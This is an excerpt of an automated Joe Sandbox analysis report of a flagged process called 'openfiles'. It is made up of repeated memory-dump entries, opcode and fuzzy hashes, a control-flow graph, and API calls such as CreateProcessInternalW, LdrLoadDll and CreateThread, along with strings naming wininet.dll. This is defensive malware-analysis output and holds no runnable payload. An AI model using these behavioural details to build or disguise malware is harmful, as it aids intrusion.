• Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: b51abde513119a4bd0350e79da3ff8c874d00d2a7c35d83990c46fff5ce89ce0
                                                                                                                                                  • Instruction ID: 479a0252a58eb9317a45b87a026e2e4c9004820ffac5ccef53450a4a17987dee
                                                                                                                                                  • Opcode Fuzzy Hash: b51abde513119a4bd0350e79da3ff8c874d00d2a7c35d83990c46fff5ce89ce0
                                                                                                                                                  • Instruction Fuzzy Hash: EC90023120150842F100B1584908B86004D8BE4305F55C026A0526654D8615D9517961
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 061605d08525b44aeec7517a8d9f53cb6962f24220e6655e8da5c269468899a3
                                                                                                                                                  • Instruction ID: b65b4b2a0f8aa920f59a58e2c1156e071da8e7957643541b70237ee4f93e08df
                                                                                                                                                  • Opcode Fuzzy Hash: 061605d08525b44aeec7517a8d9f53cb6962f24220e6655e8da5c269468899a3
                                                                                                                                                  • Instruction Fuzzy Hash: 36900221242541527545F1584908547404E9BE4245795C022A1816950C8526E956DA61
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 86eb022665994cadb3330e1da04334b563362155d87de9094303ad25ec3cbf1e
                                                                                                                                                  • Instruction ID: 9759d54e4f59ac8900c5555f54d0b217d757aa40b0c7a0212b3db58f22d59acc
                                                                                                                                                  • Opcode Fuzzy Hash: 86eb022665994cadb3330e1da04334b563362155d87de9094303ad25ec3cbf1e
                                                                                                                                                  • Instruction Fuzzy Hash: 6190023120150413F111B1584A08747004D8BD4245F95C422A0826558D9656DA52A561
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 1c9313399d016d643f5b53c9c7520c510a6eb274bdb6810961dc7f6395f9a92c
                                                                                                                                                  • Instruction ID: 4857f8ac809b13efa5008e6b06592edfec1a6571dbbad0e1d856507c377f2cf2
                                                                                                                                                  • Opcode Fuzzy Hash: 1c9313399d016d643f5b53c9c7520c510a6eb274bdb6810961dc7f6395f9a92c
                                                                                                                                                  • Instruction Fuzzy Hash: F090022921350002F180B158590C64A004D8BD5206F95D425A0417558CC915D9695761
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 1fcaa65c72c210ceeb8c13b488b9218ecab06fbada13aa1b2918cd0811ad7281
                                                                                                                                                  • Instruction ID: c345e5a5e6eb2c00d37fa012449644e9a4de1223493216eedeb954476d77dddf
                                                                                                                                                  • Opcode Fuzzy Hash: 1fcaa65c72c210ceeb8c13b488b9218ecab06fbada13aa1b2918cd0811ad7281
                                                                                                                                                  • Instruction Fuzzy Hash: 0290022130150003F140B158591C646404DDBE5305F55D021E0816554CD915D9565662
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 2050246663d0297725c5b91b3edb85d87e34e5477211a708af26be021f499fdb
                                                                                                                                                  • Instruction ID: ef317829bed814bd334293d49bc92bcba81135abaec64eeb707814cd24243ed6
                                                                                                                                                  • Opcode Fuzzy Hash: 2050246663d0297725c5b91b3edb85d87e34e5477211a708af26be021f499fdb
                                                                                                                                                  • Instruction Fuzzy Hash: 9D90022160150502F101B1584908656004E8BD4245F95C032A1426555ECA25DA92A571
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 8ee03ef67b7064ac7b7e367c95244973f1198a67d11334d780e6966d37b3497f
                                                                                                                                                  • Instruction ID: 3cfcc34d8c93c24a8162b50601db29a9a977ac36bcd7be0e608f3da875247093
                                                                                                                                                  • Opcode Fuzzy Hash: 8ee03ef67b7064ac7b7e367c95244973f1198a67d11334d780e6966d37b3497f
                                                                                                                                                  • Instruction Fuzzy Hash: F190026120190403F140B5584D08647004D8BD4306F55C021A2466555E8A29DD516575
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 4eb7429ad25b6f6d5a461417bfce9c0532982a18be75719504dc6f4d4fa3f569
                                                                                                                                                  • Instruction ID: e80f1a95d431fbc7348c24a932ee8ade54f56fb61fe8ec175d76032d201b0ceb
                                                                                                                                                  • Opcode Fuzzy Hash: 4eb7429ad25b6f6d5a461417bfce9c0532982a18be75719504dc6f4d4fa3f569
                                                                                                                                                  • Instruction Fuzzy Hash: B9900221601500426140B1688D48946404DAFE5215755C131A0D9A550D8559D9655AA5
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 3e34ab19dc40f4f1a3bab41e8d5813696d28d914f8a17ced5f12515099c9da82
                                                                                                                                                  • Instruction ID: 381c39328649ea6c4191b77e354604d232881e5e50858fd60c423b3125542dad
                                                                                                                                                  • Opcode Fuzzy Hash: 3e34ab19dc40f4f1a3bab41e8d5813696d28d914f8a17ced5f12515099c9da82
                                                                                                                                                  • Instruction Fuzzy Hash: 03900221211D0042F200B5684D18B47004D8BD4307F55C125A0556554CC915D9615961
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 395 7b3ac0-7b3ad8 396 7b3ada-7b3b04 395->396 397 7b3a5c-7b3a65 395->397 398 7b3b05-7b3b0f 396->398 397->395 399 7b3b2c-7b3b45 398->399 400 7b3b12-7b3b17 398->400 401 7b3b5e 399->401 402 7b3b47-7b3b57 399->402 400->398 404 7b3b5f-7b3b89 401->404 403 7b3b59 402->403 402->404 403->401 405 7b3b8b-7b3b8f 404->405 405->405 406 7b3b91-7b3b92 405->406 407 7b3b93-7b3b95 406->407 408 7b3b96-7b3b9c 407->408 409 7b3b9f-7b3ba1 408->409 409->409 410 7b3ba3-7b3baa 409->410 412 7b3c2b-7b3c30 410->412 413 7b3bac-7b3bb0 410->413 414 7b3c0a-7b3c10 412->414 415 7b3c32-7b3c36 412->415 416 7b3bb1-7b3bb5 413->416 417 7b3bbf-7b3bc2 414->417 418 7b3c12-7b3c26 414->418 419 7b3c38-7b3c3b 415->419 420 7b3c40-7b3c50 415->420 421 7b3bb8-7b3bbb 416->421 422 7b3bde 417->422 423 7b3bc4-7b3bc7 417->423 418->416 424 7b3c28-7b3c29 418->424 425 7b3c3d 419->425 426 7b3c63-7b3ca8 call 7bb6e0 419->426 421->407 427 7b3bbd 421->427 430 7b3bdf-7b3bed 422->430 423->408 428 7b3bc9-7b3bcc 423->428 424->421 425->420 433 7b3cae-7b3d28 call 7bb7c0 call 7a4780 call 791410 call 7b1e50 426->433 434 7b3db4-7b3dba 426->434 427->417 432 7b3bee-7b3c01 430->432 432->414 435 7b3c59 432->435 445 7b3d30-7b3d44 Sleep 433->445 435->432 437 7b3c5b-7b3c5c 435->437 437->430 446 7b3d46-7b3d58 445->446 447 7b3da5-7b3dac 445->447 449 7b3d7a-7b3d92 446->449 450 7b3d5a-7b3d78 call 7b6110 446->450 447->445 448 7b3dae 447->448 448->434 451 7b3d98-7b3d9b 449->451 452 7b3d93 call 7b61b0 449->452 450->451 451->447 452->451
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: &uqp$net.dll$net.dll$wininet.dll
                                                                                                                                                  • API String ID: 0-4186712866

Control-flow Graph
[Figure: control-flow graph starting at block 7b3c60-7b3ca8; legend: Executed / Not Executed]
                                                                                                                                                  APIs
                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 007B3D3B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep
                                                                                                                                                  • String ID: &uqp$net.dll$net.dll$wininet.dll
                                                                                                                                                  • API String ID: 3472027048-4186712866
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                  • String ID: @J7<
                                                                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                  • String ID: @J7<
                                                                                                                                                  • API String ID: 3442037557-2016760708
                                                                                                                                                  APIs
                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 007A47F2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Load
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,007A853E,00000010,?,?,?,00000044,?,00000010,007A853E,?,00000000,?), ref: 007B9B33
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateInternalProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2186235152-0
                                                                                                                                                  APIs
                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00799F05
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                  APIs
                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00799F05
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(007A1C89,?,?,007A1C89,OX{,?,?,007A1C89,OX{,00001000,?,?,00000000), ref: 007B9A2F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,CBC1F08B,00000007,00000000,00000004,00000000,007A4005,000000F4), ref: 007B9A7F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 007A85AC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,007A1F80,007B818F,OX{,007A1F46), ref: 007A83A3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                  • Opcode ID: 148eedaff8db55bf3a5833782b49742d7358bd3f5b029d745b75592f1cb1fe80
                                                                                                                                                  • Instruction ID: 1ee91f9d58dc79a058a9e80aea21e9eccc4d6f41d611f7e8d8ec8444fad56ec3
                                                                                                                                                  • Opcode Fuzzy Hash: 148eedaff8db55bf3a5833782b49742d7358bd3f5b029d745b75592f1cb1fe80
                                                                                                                                                  • Instruction Fuzzy Hash: 42E08C72A841466AFB40A6A4DC1AB9A22899B98744F4544A0B90CE7282D929F0404691
                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111), ref: 007A1067
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                  • Instruction ID: 218d090f3cbd8ebfb35872c44b2deeacc544c01b31c397cb1439de0265764098
                                                                                                                                                  • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                  • Instruction Fuzzy Hash: 30D02277B0000C7ABA2245D4ACC1DFFB72CEBC5AA6F004063FF08E2040E6218D020BB0
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,007A1F80,007B818F,OX{,007A1F46), ref: 007A83A3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                  • Opcode ID: c965f0eece465190afd2a15a9f40f7f68c5ab38c4371e4a7be65728a5541c137
                                                                                                                                                  • Instruction ID: 55a0f316137f535a0bdcb54e4dcd3379187db76d90410ac96d3d008d4f0f3c94
                                                                                                                                                  • Opcode Fuzzy Hash: c965f0eece465190afd2a15a9f40f7f68c5ab38c4371e4a7be65728a5541c137
                                                                                                                                                  • Instruction Fuzzy Hash: A3D05E716842097BFA40E6E5DC1BF5A328C8B84B54F5540A4B90CDB2C3EC59F55045A6
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 5f95bd89821471824d9afa840b8118212594b5efe182c2149d1c0c17a8dda3ec
                                                                                                                                                  • Instruction ID: af5cdee323d8401161546fffbd64736052392327eab3aac0742258f28af74b5d
                                                                                                                                                  • Opcode Fuzzy Hash: 5f95bd89821471824d9afa840b8118212594b5efe182c2149d1c0c17a8dda3ec
                                                                                                                                                  • Instruction Fuzzy Hash: F8B09B719015C5C5FB11F7604B0C71779586BD0705F15C0B1D2431651E4738D1D1E5F5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124762931.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4840000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                  • API String ID: 0-3558027158
                                                                                                                                                  • Opcode ID: 7c7e7d05391ad94d3202db7973293c7fb6faa178aa516727d55ca1a79c9e369a
                                                                                                                                                  • Instruction ID: 7b76c4475eb0cbe5d722189b67849e038d94ae96230f752fabd0c1e03ce720fc
                                                                                                                                                  • Opcode Fuzzy Hash: 7c7e7d05391ad94d3202db7973293c7fb6faa178aa516727d55ca1a79c9e369a
                                                                                                                                                  • Instruction Fuzzy Hash: 70915EF04482988AC7158F54A0652AFFFB1EBC6305F15856DE7E6BB243C3BE8905CB85
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  • Opcode ID: 71f360162e71e5149cb3e08507a6e71ac0531e5f8d73b1a3cf38d74d0c2abe86
                                                                                                                                                  • Instruction ID: 7280fe288aa8cab603d5fb64d8d254b64dd87bcb1f859159bb24a3a6c5fc1f08
                                                                                                                                                  • Opcode Fuzzy Hash: 71f360162e71e5149cb3e08507a6e71ac0531e5f8d73b1a3cf38d74d0c2abe86
